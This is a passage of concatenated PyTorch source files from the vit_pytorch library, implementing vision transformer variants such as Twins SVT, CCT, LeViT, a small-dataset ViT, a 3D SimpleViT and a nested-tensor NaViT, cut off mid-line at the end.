1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class PatchEmbedding(nn.Module): def __init__(self, *, dim, dim_out, patch_size): super().__init__() self.dim = dim self.dim_out = dim_out self.patch_size = patch_size self.proj = nn.Sequential( LayerNorm(patch_size ** 2 * dim), nn.Conv2d(patch_size ** 2 * dim, dim_out, 1), LayerNorm(dim_out) ) def forward(self, fmap): p = self.patch_size fmap = rearrange(fmap, 'b c (h p1) (w p2) -> b (c p1 p2) h w', p1 = p, p2 = p) return self.proj(fmap) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = Residual(nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1)) def forward(self, x): return self.proj(x) class LocalAttention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., patch_size = 7): super().__init__() inner_dim = dim_head * heads self.patch_size = patch_size self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.to_q = nn.Conv2d(dim, inner_dim, 1, bias = False) self.to_kv = nn.Conv2d(dim, inner_dim * 2, 1, bias = False) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, fmap): fmap = self.norm(fmap) shape, p = fmap.shape, self.patch_size b, n, x, y, h = *shape, self.heads x, y = map(lambda t: t // p, (x, y)) fmap = rearrange(fmap, 'b c (x p1) (y p2) -> (b x y) c p1 p2', p1 = p, p2 = p) q, k, v = (self.to_q(fmap), *self.to_kv(fmap).chunk(2, dim = 1)) q, k, v = map(lambda t: rearrange(t, 'b (h d) p1 p2 -> (b h) (p1 p2) d', h = h), (q, k, v)) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = dots.softmax(dim = - 1) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b x y h) (p1 p2) d -> b (h d) (x p1) (y p2)', h = h, x = x, y = y, p1 = p, p2 = p) return self.to_out(out) class GlobalAttention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., k = 7): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.to_q = nn.Conv2d(dim, inner_dim, 1, bias = False) self.to_kv = nn.Conv2d(dim, inner_dim * 2, k, stride = k, bias = False) self.dropout = nn.Dropout(dropout) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): x = self.norm(x) shape = x.shape b, n, _, y, h = *shape, self.heads q, k, v = (self.to_q(x), *self.to_kv(x).chunk(2, dim = 1)) q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> (b h) (x y) d', h = h), (q, k, v)) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = dots.softmax(dim = -1) attn = self.dropout(attn) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b h) (x y) d -> b (h d) x y', h = h, y = y) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads = 8, dim_head = 64, mlp_mult = 4, local_patch_size = 7, global_k = 7, dropout = 0., has_local = True): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Residual(LocalAttention(dim, heads = heads, dim_head = dim_head, dropout = dropout, patch_size = local_patch_size)) if has_local else nn.Identity(), Residual(FeedForward(dim, mlp_mult, dropout = dropout)) if has_local else nn.Identity(), Residual(GlobalAttention(dim, heads = heads, dim_head = dim_head, dropout = dropout, k = global_k)), Residual(FeedForward(dim, mlp_mult, dropout = dropout)) ])) def forward(self, x): for local_attn, ff1, global_attn, ff2 in self.layers: x = local_attn(x) x = ff1(x) x = global_attn(x) x = ff2(x) return x class TwinsSVT(nn.Module): def __init__( self, *, num_classes, s1_emb_dim = 64, s1_patch_size = 4, s1_local_patch_size = 7, s1_global_k = 7, s1_depth = 1, s2_emb_dim = 128, s2_patch_size = 2, s2_local_patch_size = 7, s2_global_k = 7, s2_depth = 1, s3_emb_dim = 256, s3_patch_size = 2, s3_local_patch_size = 7, s3_global_k = 7, s3_depth = 5, s4_emb_dim = 512, s4_patch_size = 2, s4_local_patch_size = 7, s4_global_k = 7, s4_depth = 4, peg_kernel_size = 3, dropout = 0. ): super().__init__() kwargs = dict(locals()) dim = 3 layers = [] for prefix in ('s1', 's2', 's3', 's4'): config, kwargs = group_by_key_prefix_and_remove_prefix(f'{prefix}_', kwargs) is_last = prefix == 's4' dim_next = config['emb_dim'] layers.append(nn.Sequential( PatchEmbedding(dim = dim, dim_out = dim_next, patch_size = config['patch_size']), Transformer(dim = dim_next, depth = 1, local_patch_size = config['local_patch_size'], global_k = config['global_k'], dropout = dropout, has_local = not is_last), PEG(dim = dim_next, kernel_size = peg_kernel_size), Transformer(dim = dim_next, depth = config['depth'], local_patch_size = config['local_patch_size'], global_k = config['global_k'], dropout = dropout, has_local = not is_last) )) dim = dim_next self.layers = nn.Sequential( *layers, nn.AdaptiveAvgPool2d(1), Rearrange('... () () -> ...'), nn.Linear(dim, num_classes) ) def forward(self, x): return self.layers(x) File: vit_pytorch/cct.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # CCT Models __all__ = ['cct_2', 'cct_4', 'cct_6', 'cct_7', 'cct_8', 'cct_14', 'cct_16'] def cct_2(*args, **kwargs): return _cct(num_layers=2, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_4(*args, **kwargs): return _cct(num_layers=4, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_6(*args, **kwargs): return _cct(num_layers=6, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_7(*args, **kwargs): return _cct(num_layers=7, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_8(*args, **kwargs): return _cct(num_layers=8, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_14(*args, **kwargs): return _cct(num_layers=14, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def cct_16(*args, **kwargs): return _cct(num_layers=16, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def _cct(num_layers, num_heads, mlp_ratio, embedding_dim, kernel_size=3, stride=None, padding=None, *args, **kwargs): stride = default(stride, max(1, (kernel_size // 2) - 1)) padding = default(padding, max(1, (kernel_size // 2))) return CCT(num_layers=num_layers, num_heads=num_heads, mlp_ratio=mlp_ratio, embedding_dim=embedding_dim, kernel_size=kernel_size, stride=stride, padding=padding, *args, **kwargs) # positional def sinusoidal_embedding(n_channels, dim): pe = torch.FloatTensor([[p / (10000 ** (2 * (i // 2) / dim)) for i in range(dim)] for p in range(n_channels)]) pe[:, 0::2] = torch.sin(pe[:, 0::2]) pe[:, 1::2] = torch.cos(pe[:, 1::2]) return rearrange(pe, '... -> 1 ...') # modules class Attention(nn.Module): def __init__(self, dim, num_heads=8, attention_dropout=0.1, projection_dropout=0.1): super().__init__() self.heads = num_heads head_dim = dim // self.heads self.scale = head_dim ** -0.5 self.qkv = nn.Linear(dim, dim * 3, bias=False) self.attn_drop = nn.Dropout(attention_dropout) self.proj = nn.Linear(dim, dim) self.proj_drop = nn.Dropout(projection_dropout) def forward(self, x): B, N, C = x.shape qkv = self.qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = q * self.scale attn = einsum('b h i d, b h j d -> b h i j', q, k) attn = attn.softmax(dim=-1) attn = self.attn_drop(attn) x = einsum('b h i j, b h j d -> b h i d', attn, v) x = rearrange(x, 'b h n d -> b n (h d)') return self.proj_drop(self.proj(x)) class TransformerEncoderLayer(nn.Module): """ Inspired by torch.nn.TransformerEncoderLayer and rwightman's timm package. """ def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, attention_dropout=0.1, drop_path_rate=0.1): super().__init__() self.pre_norm = nn.LayerNorm(d_model) self.self_attn = Attention(dim=d_model, num_heads=nhead, attention_dropout=attention_dropout, projection_dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout1 = nn.Dropout(dropout) self.norm1 = nn.LayerNorm(d_model) self.linear2 = nn.Linear(dim_feedforward, d_model) self.dropout2 = nn.Dropout(dropout) self.drop_path = DropPath(drop_path_rate) self.activation = F.gelu def forward(self, src, *args, **kwargs): src = src + self.drop_path(self.self_attn(self.pre_norm(src))) src = self.norm1(src) src2 = self.linear2(self.dropout1(self.activation(self.linear1(src)))) src = src + self.drop_path(self.dropout2(src2)) return src class DropPath(nn.Module): def __init__(self, drop_prob=None): super().__init__() self.drop_prob = float(drop_prob) def forward(self, x): batch, drop_prob, device, dtype = x.shape[0], self.drop_prob, x.device, x.dtype if drop_prob <= 0. or not self.training: return x keep_prob = 1 - self.drop_prob shape = (batch, *((1,) * (x.ndim - 1))) keep_mask = torch.zeros(shape, device = device).float().uniform_(0, 1) < keep_prob output = x.div(keep_prob) * keep_mask.float() return output class Tokenizer(nn.Module): def __init__(self, kernel_size, stride, padding, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, n_conv_layers=1, n_input_channels=3, n_output_channels=64, in_planes=64, activation=None, max_pool=True, conv_bias=False): super().__init__() n_filter_list = [n_input_channels] + \ [in_planes for _ in range(n_conv_layers - 1)] + \ [n_output_channels] n_filter_list_pairs = zip(n_filter_list[:-1], n_filter_list[1:]) self.conv_layers = nn.Sequential( *[nn.Sequential( nn.Conv2d(chan_in, chan_out, kernel_size=(kernel_size, kernel_size), stride=(stride, stride), padding=(padding, padding), bias=conv_bias), nn.Identity() if not exists(activation) else activation(), nn.MaxPool2d(kernel_size=pooling_kernel_size, stride=pooling_stride, padding=pooling_padding) if max_pool else nn.Identity() ) for chan_in, chan_out in n_filter_list_pairs ]) self.apply(self.init_weight) def sequence_length(self, n_channels=3, height=224, width=224): return self.forward(torch.zeros((1, n_channels, height, width))).shape[1] def forward(self, x): return rearrange(self.conv_layers(x), 'b c h w -> b (h w) c') @staticmethod def init_weight(m): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight) class TransformerClassifier(nn.Module): def __init__(self, seq_pool=True, embedding_dim=768, num_layers=12, num_heads=12, mlp_ratio=4.0, num_classes=1000, dropout_rate=0.1, attention_dropout=0.1, stochastic_depth_rate=0.1, positional_embedding='sine', sequence_length=None, *args, **kwargs): super().__init__() assert positional_embedding in {'sine', 'learnable', 'none'} dim_feedforward = int(embedding_dim * mlp_ratio) self.embedding_dim = embedding_dim self.sequence_length = sequence_length self.seq_pool = seq_pool assert exists(sequence_length) or positional_embedding == 'none', \ f"Positional embedding is set to {positional_embedding} and" \ f" the sequence length was not specified." if not seq_pool: sequence_length += 1 self.class_emb = nn.Parameter(torch.zeros(1, 1, self.embedding_dim), requires_grad=True) else: self.attention_pool = nn.Linear(self.embedding_dim, 1) if positional_embedding == 'none': self.positional_emb = None elif positional_embedding == 'learnable': self.positional_emb = nn.Parameter(torch.zeros(1, sequence_length, embedding_dim), requires_grad=True) nn.init.trunc_normal_(self.positional_emb, std=0.2) else: self.positional_emb = nn.Parameter(sinusoidal_embedding(sequence_length, embedding_dim), requires_grad=False) self.dropout = nn.Dropout(p=dropout_rate) dpr = [x.item() for x in torch.linspace(0, stochastic_depth_rate, num_layers)] self.blocks = nn.ModuleList([ TransformerEncoderLayer(d_model=embedding_dim, nhead=num_heads, dim_feedforward=dim_feedforward, dropout=dropout_rate, attention_dropout=attention_dropout, drop_path_rate=layer_dpr) for layer_dpr in dpr]) self.norm = nn.LayerNorm(embedding_dim) self.fc = nn.Linear(embedding_dim, num_classes) self.apply(self.init_weight) def forward(self, x): b = x.shape[0] if not exists(self.positional_emb) and x.size(1) < self.sequence_length: x = F.pad(x, (0, 0, 0, self.n_channels - x.size(1)), mode='constant', value=0) if not self.seq_pool: cls_token = repeat(self.class_emb, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_token, x), dim=1) if exists(self.positional_emb): x += self.positional_emb x = self.dropout(x) for blk in self.blocks: x = blk(x) x = self.norm(x) if self.seq_pool: attn_weights = rearrange(self.attention_pool(x), 'b n 1 -> b n') x = einsum('b n, b n d -> b d', attn_weights.softmax(dim = 1), x) else: x = x[:, 0] return self.fc(x) @staticmethod def init_weight(m): if isinstance(m, nn.Linear): nn.init.trunc_normal_(m.weight, std=.02) if isinstance(m, nn.Linear) and exists(m.bias): nn.init.constant_(m.bias, 0) elif isinstance(m, nn.LayerNorm): nn.init.constant_(m.bias, 0) nn.init.constant_(m.weight, 1.0) # CCT Main model class CCT(nn.Module): def __init__( self, img_size=224, embedding_dim=768, n_input_channels=3, n_conv_layers=1, kernel_size=7, stride=2, padding=3, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, *args, **kwargs ): super().__init__() img_height, img_width = pair(img_size) self.tokenizer = Tokenizer(n_input_channels=n_input_channels, n_output_channels=embedding_dim, kernel_size=kernel_size, stride=stride, padding=padding, pooling_kernel_size=pooling_kernel_size, pooling_stride=pooling_stride, pooling_padding=pooling_padding, max_pool=True, activation=nn.ReLU, n_conv_layers=n_conv_layers, conv_bias=False) self.classifier = TransformerClassifier( sequence_length=self.tokenizer.sequence_length(n_channels=n_input_channels, height=img_height, width=img_width), embedding_dim=embedding_dim, seq_pool=True, dropout_rate=0., attention_dropout=0.1, stochastic_depth=0.1, *args, **kwargs) def forward(self, x): x = self.tokenizer(x) return self.classifier(x) File: vit_pytorch/recorder.py from functools import wraps import torch from torch import nn from vit_pytorch.vit import Attention def find_modules(nn_module, type): return [module for module in nn_module.modules() if isinstance(module, type)] class Recorder(nn.Module): def __init__(self, vit, device = None): super().__init__() self.vit = vit self.data = None self.recordings = [] self.hooks = [] self.hook_registered = False self.ejected = False self.device = device def _hook(self, _, input, output): self.recordings.append(output.clone().detach()) def _register_hook(self): modules = find_modules(self.vit.transformer, Attention) for module in modules: handle = module.attend.register_forward_hook(self._hook) self.hooks.append(handle) self.hook_registered = True def eject(self): self.ejected = True for hook in self.hooks: hook.remove() self.hooks.clear() return self.vit def clear(self): self.recordings.clear() def record(self, attn): recording = attn.clone().detach() self.recordings.append(recording) def forward(self, img): assert not self.ejected, 'recorder has been ejected, cannot be used anymore' self.clear() if not self.hook_registered: self._register_hook() pred = self.vit(img) # move all recordings to one device before stacking target_device = self.device if self.device is not None else img.device recordings = tuple(map(lambda t: t.to(target_device), self.recordings)) attns = torch.stack(recordings, dim = 1) if len(recordings) > 0 else None return pred, attns File: vit_pytorch/levit.py from math import ceil import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def cast_tuple(val, l = 3): val = val if isinstance(val, tuple) else (val,) return (*val, *((val[-1],) * max(l - len(val), 0))) def always(val): return lambda *args, **kwargs: val # classes class FeedForward(nn.Module): def __init__(self, dim, mult, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim, dim * mult, 1), nn.Hardswish(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, fmap_size, heads = 8, dim_key = 32, dim_value = 64, dropout = 0., dim_out = None, downsample = False): super().__init__() inner_dim_key = dim_key * heads inner_dim_value = dim_value * heads dim_out = default(dim_out, dim) self.heads = heads self.scale = dim_key ** -0.5 self.to_q = nn.Sequential(nn.Conv2d(dim, inner_dim_key, 1, stride = (2 if downsample else 1), bias = False), nn.BatchNorm2d(inner_dim_key)) self.to_k = nn.Sequential(nn.Conv2d(dim, inner_dim_key, 1, bias = False), nn.BatchNorm2d(inner_dim_key)) self.to_v = nn.Sequential(nn.Conv2d(dim, inner_dim_value, 1, bias = False), nn.BatchNorm2d(inner_dim_value)) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) out_batch_norm = nn.BatchNorm2d(dim_out) nn.init.zeros_(out_batch_norm.weight) self.to_out = nn.Sequential( nn.GELU(), nn.Conv2d(inner_dim_value, dim_out, 1), out_batch_norm, nn.Dropout(dropout) ) # positional bias self.pos_bias = nn.Embedding(fmap_size * fmap_size, heads) q_range = torch.arange(0, fmap_size, step = (2 if downsample else 1)) k_range = torch.arange(fmap_size) q_pos = torch.stack(torch.meshgrid(q_range, q_range, indexing = 'ij'), dim = -1) k_pos = torch.stack(torch.meshgrid(k_range, k_range, indexing = 'ij'), dim = -1) q_pos, k_pos = map(lambda t: rearrange(t, 'i j c -> (i j) c'), (q_pos, k_pos)) rel_pos = (q_pos[:, None, ...] - k_pos[None, :, ...]).abs() x_rel, y_rel = rel_pos.unbind(dim = -1) pos_indices = (x_rel * fmap_size) + y_rel self.register_buffer('pos_indices', pos_indices) def apply_pos_bias(self, fmap): bias = self.pos_bias(self.pos_indices) bias = rearrange(bias, 'i j h -> () h i j') return fmap + (bias / self.scale) def forward(self, x): b, n, *_, h = *x.shape, self.heads q = self.to_q(x) y = q.shape[2] qkv = (q, self.to_k(x), self.to_v(x)) q, k, v = map(lambda t: rearrange(t, 'b (h d) ... -> b h (...) d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale dots = self.apply_pos_bias(dots) attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h (x y) d -> b (h d) x y', h = h, y = y) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, fmap_size, depth, heads, dim_key, dim_value, mlp_mult = 2, dropout = 0., dim_out = None, downsample = False): super().__init__() dim_out = default(dim_out, dim) self.layers = nn.ModuleList([]) self.attn_residual = (not downsample) and dim == dim_out for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, fmap_size = fmap_size, heads = heads, dim_key = dim_key, dim_value = dim_value, dropout = dropout, downsample = downsample, dim_out = dim_out), FeedForward(dim_out, mlp_mult, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: attn_res = (x if self.attn_residual else 0) x = attn(x) + attn_res x = ff(x) + x return x class LeViT(nn.Module): def __init__( self, *, image_size, num_classes, dim, depth, heads, mlp_mult, stages = 3, dim_key = 32, dim_value = 64, dropout = 0., num_distill_classes = None ): super().__init__() dims = cast_tuple(dim, stages) depths = cast_tuple(depth, stages) layer_heads = cast_tuple(heads, stages) assert all(map(lambda t: len(t) == stages, (dims, depths, layer_heads))), 'dimensions, depths, and heads must be a tuple that is less than the designated number of stages' self.conv_embedding = nn.Sequential( nn.Conv2d(3, 32, 3, stride = 2, padding = 1), nn.Conv2d(32, 64, 3, stride = 2, padding = 1), nn.Conv2d(64, 128, 3, stride = 2, padding = 1), nn.Conv2d(128, dims[0], 3, stride = 2, padding = 1) ) fmap_size = image_size // (2 ** 4) layers = [] for ind, dim, depth, heads in zip(range(stages), dims, depths, layer_heads): is_last = ind == (stages - 1) layers.append(Transformer(dim, fmap_size, depth, heads, dim_key, dim_value, mlp_mult, dropout)) if not is_last: next_dim = dims[ind + 1] layers.append(Transformer(dim, fmap_size, 1, heads * 2, dim_key, dim_value, dim_out = next_dim, downsample = True)) fmap_size = ceil(fmap_size / 2) self.backbone = nn.Sequential(*layers) self.pool = nn.Sequential( nn.AdaptiveAvgPool2d(1), Rearrange('... () () -> ...') ) self.distill_head = nn.Linear(dim, num_distill_classes) if exists(num_distill_classes) else always(None) self.mlp_head = nn.Linear(dim, num_classes) def forward(self, img): x = self.conv_embedding(img) x = self.backbone(x) x = self.pool(x) out = self.mlp_head(x) distill = self.distill_head(x) if exists(distill): return out, distill return out File: vit_pytorch/vit_for_small_dataset.py from math import sqrt import torch import torch.nn.functional as F from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class LSA(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.temperature = nn.Parameter(torch.log(torch.tensor(dim_head ** -0.5))) self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.temperature.exp() mask = torch.eye(dots.shape[-1], device = dots.device, dtype = torch.bool) mask_value = -torch.finfo(dots.dtype).max dots = dots.masked_fill(mask, mask_value) attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ LSA(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class SPT(nn.Module): def __init__(self, *, dim, patch_size, channels = 3): super().__init__() patch_dim = patch_size * patch_size * 5 * channels self.to_patch_tokens = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim) ) def forward(self, x): shifts = ((1, -1, 0, 0), (-1, 1, 0, 0), (0, 0, 1, -1), (0, 0, -1, 1)) shifted_x = list(map(lambda shift: F.pad(x, shift), shifts)) x_with_shifts = torch.cat((x, *shifted_x), dim = 1) return self.to_patch_tokens(x_with_shifts) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = SPT(dim = dim, patch_size = patch_size, channels = channels) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/simple_vit_3d.py import torch import torch.nn.functional as F from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_3d(patches, temperature = 10000, dtype = torch.float32): _, f, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype z, y, x = torch.meshgrid( torch.arange(f, device = device), torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') fourier_dim = dim // 6 omega = torch.arange(fourier_dim, device = device) / (fourier_dim - 1) omega = 1. / (temperature ** omega) z = z.flatten()[:, None] * omega[None, :] y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos(), z.sin(), z.cos()), dim = 1) pe = F.pad(pe, (0, dim - (fourier_dim * 6))) # pad if feature dimension not cleanly divisible by 6 return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert frames % frame_patch_size == 0, 'Frames must be divisible by the frame patch size' num_patches = (image_height // patch_height) * (image_width // patch_width) * (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b f h w (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, video): *_, h, w, dtype = *video.shape, video.dtype x = self.to_patch_embedding(video) pe = posemb_sincos_3d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/__init__.py from vit_pytorch.vit import ViT from vit_pytorch.simple_vit import SimpleViT from vit_pytorch.mae import MAE from vit_pytorch.dino import Dino File: vit_pytorch/na_vit_nested_tensor.py from __future__ import annotations from typing import List from functools import partial import torch import packaging.version as pkg_version if pkg_version.parse(torch.__version__) < pkg_version.parse('2.4'): print('nested tensor NaViT was tested on pytorch 2.4') from torch import nn, Tensor import torch.nn.functional as F from torch.nn import Module, ModuleList from torch.nested import nested_tensor from einops import rearrange from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) def divisible_by(numer, denom): return (numer % denom) == 0 # feedforward def FeedForward(dim, hidden_dim, dropout = 0.): return nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim, bias = False) dim_inner = heads * dim_head self.heads = heads self.dim_head = dim_head self.to_queries = nn.Linear(dim, dim_inner, bias = False) self.to_keys = nn.Linear(dim, dim_inner, bias = False) self.to_values = nn.Linear(dim, dim_inner, bias = False) # in the paper, they employ qk rmsnorm, a way to stabilize attention # will use layernorm in place of rmsnorm, which has been shown to work in certain papers. requires l2norm on non-ragged dimension to be supported in nested tensors self.query_norm = nn.LayerNorm(dim_head, bias = False) self.key_norm = nn.LayerNorm(dim_head, bias = False) self.dropout = dropout self.to_out = nn.Linear(dim_inner, dim, bias = False) def forward( self, x, context: Tensor | None = None ): x = self.norm(x) # for attention pooling, one query pooling to entire sequence context = default(context, x) # queries, keys, values query = self.to_queries(x) key = self.to_keys(context) value = self.to_values(context) # split heads def split_heads(t): return t.unflatten(-1, (self.heads, self.dim_head)) def transpose_head_seq(t): return t.transpose(1, 2) query, key, value = map(split_heads, (query, key, value)) # qk norm for attention stability query = self.query_norm(query) key = self.key_norm(key) query, key, value = map(transpose_head_seq, (query, key, value)) # attention out = F.scaled_dot_product_attention( query, key, value, dropout_p = self.dropout if self.training else 0. ) # merge heads out = out.transpose(1, 2).flatten(-2) return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = ModuleList([]) for _ in range(depth): self.layers.append(ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) self.norm = nn.LayerNorm(dim, bias = False) def forward(self, x): for attn, ff in self.layers: x = attn(x) + 